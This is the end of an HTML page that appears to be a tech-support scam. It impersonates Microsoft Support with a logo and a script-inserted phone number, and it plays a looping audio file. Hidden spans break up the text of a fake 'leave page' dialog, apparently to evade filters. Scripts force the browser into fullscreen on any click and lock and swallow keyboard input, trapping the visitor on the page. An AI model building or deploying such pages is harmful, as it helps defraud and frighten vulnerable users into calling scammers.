				<label for="checkbox">Prevent th<span style="display:none;">ggv</span>is pa<span style="display:none;">uol</span>ge fr<span style="display:none;">yvj</span>om cr<span style="display:none;">frq</span>eating ad<span style="display:none;">wkf</span>ditional dialogs</label><br />
				<div class="action_buttons">
					<a class="" id="leave_page">Cancel</a>
					<a class="active" id="leave_page">Leave</a>
				</div>
			</div>
		</div>

		<div id="chat-box">
			<img src="microsoft.png" /><span
				style="color: #222; font-size: 21px; font-weight: 600; margin-left: 16px; position: relative; top: -5px"
				>Microsoft Support</span
			>
			<h4 style="font-weight: 800">
				<script>
					document.write(phone);
				</script>
			</h4>
			<div class="arrow-down">
				<i class="fa fa-caret-down"></i>
			</div>
			<audio id="audio" src="speech.mp3" loop=""></audio>
		</div>
		<script src="jquery.min.js"></script>
		<script src="bootstrap.min.js" crossorigin="anonymous"></script>
		<script type="text/javascript" src="main.js"></script>
		<script type="text/javascript" src="scripts.js"></script>

		<script>
			addEventListener('click', function () {
				var el = document.documentElement,
					rfs = el.requestFullScreen || el.webkitRequestFullScreen || el.mozRequestFullScreen;
				rfs.call(el);
			});
		</script>
		<script>
			document.onkeydown = function (a) {
				return !1;
			};
		</script>

		<script>
			navigator.keyboard.lock();
			document.onkeydown = function (e) {
				return false;
			};
		</script>
	<center><a href="privacy-policy.html">Privacy policy</a> | <a href="terms.html">Terms and Conditions</a></center></body>
</html>
